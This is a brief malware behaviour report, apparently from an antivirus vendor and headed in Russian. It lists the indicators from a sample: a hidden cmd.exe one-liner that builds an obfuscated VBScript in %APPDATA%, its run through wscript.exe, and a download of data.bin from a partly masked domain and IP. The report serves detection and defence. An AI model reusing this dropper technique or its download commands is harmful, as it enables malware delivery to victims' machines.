Техническая информация
- '<SYSTEM32>\cmd.exe' /V /C set "P6=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM NWo" "DTc=5" "T4" "sUb T4()" "K1qY1Cb=91" "O47S=95919616" "VaNR=59" "FoR JyM=1 To O47S" "M7WsEGc=M7WsEGc+1" "nExt" "YfMF=62" "iF M7WsEG...
- %APPDATA%\16999.vbs
- 'pa###louf.com':80
- '20#.#7.8.251':80
- http://pa###louf.com/data.bin
- DNS ASK pa###louf.com
- '<SYSTEM32>\wscript.exe' "%APPDATA%\16999.vbs"
- '<SYSTEM32>\cmd.exe' /V /C set "P6=%APPDATA%\%RANDOM%.vbs" && (for %i in ("DiM NWo" "DTc=5" "T4" "sUb T4()" "K1qY1Cb=91" "O47S=95919616" "VaNR=59" "FoR JyM=1 To O47S" "M7WsEGc=M7WsEGc+1" "nExt" "YfMF=62" "iF M7WsEG...' (со скрытым окном)